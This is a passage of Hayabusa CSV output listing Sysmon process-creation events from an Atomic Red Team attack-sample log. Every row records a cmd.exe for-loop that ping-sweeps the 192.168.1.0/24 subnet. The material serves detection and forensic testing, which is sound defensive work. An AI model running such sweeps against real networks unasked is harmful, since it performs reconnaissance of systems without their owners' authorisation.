| 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:02.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:03.557 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.044 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:04.539 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:05.517 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.023 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:06.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.047 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.185 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D953-5D31-0000-0010EFAE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.533 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.186 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D953-5D31-0000-0010B7B73600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:07.912 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.187 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D953-5D31-0000-0010A3BA3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:08.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.188 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D954-5D31-0000-00108FBD3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.189 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-D955-5D31-0000-0010D6C03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:09.515 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.190 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 684 | PGUID: 
747F3D96-D955-5D31-0000-0010C2C33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.191 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 504 | PGUID: 747F3D96-D956-5D31-0000-0010AEC63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:10.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.192 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6608 | PGUID: 747F3D96-D956-5D31-0000-00109AC93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.193 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1128 | PGUID: 747F3D96-D957-5D31-0000-001086CC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.194 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D957-5D31-0000-001072CF3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.195 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5244 | PGUID: 747F3D96-D958-5D31-0000-00105ED23600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:12.537 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.196 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4460 | PGUID: 747F3D96-D958-5D31-0000-001026DB3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.022 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.197 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-D959-5D31-0000-001016DE3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:13.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.198 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-D959-5D31-0000-001007E13600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.199 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 936 | PGUID: 747F3D96-D95A-5D31-0000-0010F7E33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:14.513 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.200 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4480 | PGUID: 747F3D96-D95A-5D31-0000-0010EBE63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.001 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.201 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6464 | PGUID: 747F3D96-D95A-5D31-0000-0010DBE93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:15.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.202 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2392 | PGUID: 747F3D96-D95B-5D31-0000-0010CCEC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.203 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2624 | PGUID: 747F3D96-D95C-5D31-0000-001039F03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:16.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.204 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6804 | PGUID: 747F3D96-D95C-5D31-0000-0010F7F53600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.205 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 884 | PGUID: 747F3D96-D95D-5D31-0000-001001F93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:17.438 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.206 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D95D-5D31-0000-0010C8013700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.207 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3436 | PGUID: 747F3D96-D95E-5D31-0000-0010B5043700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:18.544 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.208 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6296 | PGUID: 747F3D96-D95E-5D31-0000-0010A1073700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.209 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D95F-5D31-0000-0010930A3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:19.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.210 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6184 | PGUID: 747F3D96-D95F-5D31-0000-00107F0D3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.009 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.211 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-D960-5D31-0000-00106B103700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:20.571 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.212 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 980 | PGUID: 747F3D96-D960-5D31-0000-001057133700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.020 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.213 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D961-5D31-0000-0010891F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:21.520 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.214 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2892 | PGUID: 747F3D96-D961-5D31-0000-001075223700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.215 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-D962-5D31-0000-001061253700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:22.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.216 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5124 | PGUID: 747F3D96-D962-5D31-0000-0010292E3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.011 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.217 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1996 | PGUID: 747F3D96-D963-5D31-0000-001016313700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
23:53:23.546 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.218 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2884 | PGUID: 747F3D96-D963-5D31-0000-001002343700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:23.993 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.219 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3896 | PGUID: 747F3D96-D963-5D31-0000-0010EF363700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:24.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.220 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6856 | PGUID: 747F3D96-D964-5D31-0000-0010DB393700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 23:53:25.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.221 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4932 | PGUID: 
